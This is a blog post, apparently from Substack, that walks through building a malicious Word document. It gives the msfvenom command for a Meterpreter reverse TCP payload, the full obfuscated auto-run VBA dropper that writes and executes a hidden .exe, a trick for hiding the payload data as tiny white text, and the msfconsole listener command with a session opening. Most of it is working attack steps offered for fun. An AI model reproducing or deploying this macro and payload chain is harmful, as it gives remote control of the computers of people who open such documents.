Hello All. I’m as sick as a dog currently, but that isn’t going to stop me from writing a Substack post for this week. Today’s post will discuss VBA and MS Office macros.
What
You may have heard of macros before. In MS Office, macros are used to automate repetitive tasks and to give you more control over an Office document. Let’s say, for example, you wanted to open up a message box whenever someone clicked on a certain cell in Excel. In order to do that, you would need to write a macro.
Office macros are written in Visual Basic for Applications, or VBA. VBA has access to most, if not all, of the .NET API. Meaning you can control a lot of Windows material. If you’re good enough, you can fit something malicious into a macro to do who knows what.
How
Instead of having a crash course in Visual Basic, why not let some tools do the heavy lifting for us? Metasploit can create a malicious macro for us to open a Meterpreter session.
Do you know how to use Metasploit? If not, I’ve you covered.
Metasploit’s built-in macro generator will most likely be caught by an AV. But, with some finesse, you can create an actually useful macro while slipping in some malicious code in between it.
Why
Because it’s fun.
Methodology
Create a malicious VBA macro that opens up a reverse TCP shell.
Insert that macro into a Word document.
Create a reverse TCP handler.
Open the Word document.
???
Profit
Requirements
Metasploit on either Windows or Linux, preferably on WSL.
Microsoft Office.
Shutting off your AV (unless you plan on writing your own VBA macro).
Firstly, you’ll want to create a Word document that you want to infect. You can use other Office document types, however the example I will use only works on Word. I will use my resume.
We’re all cool kids here, so we can create the macro in a single line.
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe > vba.txt
This creates a unique office macro which opens up a Meterpreter reverse TCP shell along with supplementing data and exports it to vba.txt.
When you open vba.txt, you are given 2 sets of data.
'**************************************************************
'*
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
'*
'**************************************************************
First, let’s first focus on the macro itself.
Sub Auto_Open()
Micos12
End Sub
Sub Micos12()
Dim Micos7 As Integer
Dim Micos1 As String
Dim Micos2 As String
Dim Micos3 As Integer
Dim Micos4 As Paragraph
Dim Micos8 As Integer
Dim Micos9 As Boolean
Dim Micos5 As Integer
Dim Micos11 As String
Dim Micos6 As Byte
Dim Ncmkypmwgt as String
Ncmkypmwgt = "Ncmkypmwgt"
Micos1 = "OcHdHkMasQMMpO.exe"
Micos2 = Environ("USERPROFILE")
ChDrive (Micos2)
ChDir (Micos2)
Micos3 = FreeFile()
Open Micos1 For Binary As Micos3
For Each Micos4 in ActiveDocument.Paragraphs
DoEvents
Micos11 = Micos4.Range.Text
If (Micos9 = True) Then
Micos8 = 1
While (Micos8 < Len(Micos11))
Micos6 = Mid(Micos11,Micos8,4)
Put #Micos3, , Micos6
Micos8 = Micos8 + 4
Wend
ElseIf (InStr(1,Micos11,Ncmkypmwgt) > 0 And Len(Micos11) > 0) Then
Micos9 = True
End If
Next
Close #Micos3
Micos13(Micos1)
End Sub
Sub Micos13(Micos10 As String)
Dim Micos7 As Integer
Dim Micos2 As String
Micos2 = Environ("USERPROFILE")
ChDrive (Micos2)
ChDir (Micos2)
Micos7 = Shell(Micos10, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The macros is an obfuscated set of code that opens up the reverse shell. Whenever the file is opened, Workbook_Open
is called (earlier forms of Word call AutoOpen
/Auto_Open
, so those exist for backwards compatibility).
To add a new macro. Copy the code of the macro (excluding the hex data below it), click View, then click Macros. This will open up a box where you enter the name of your new macro, calling it whatever you want. Once you click Create, you will open a new page. Once you are in the page, paste the code into the script box, overwriting everything.
For part 2, there is a section of hex data. For something as large and powerful as a Meterpreter shell, the script requires a lot of data to be executed. Unfortunately, it needs to be added at the end of the document, however there is a trick you can do to hide it better.
Paste the data at the end of the document.
Set the Font Size to 1.
Set the text color to white.
After pasting the entirety of the data onto the end of the document, the document is now malicious, and opening will execute the exploit.
All that is left is to create a reverse TCP listener.
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 4444; run;"
Now, you can open the exploited document and a Meterpreter session will open!
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 127.0.0.1
LPORT => 4444
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Sending stage (175174 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57252 ) at 2022-11-16 12:19:24 -0600
meterpreter >
That concludes this week’s post. Have a great weekend. Don’t forget to turn your AV back on!
Go!
-BowTiedCrawfish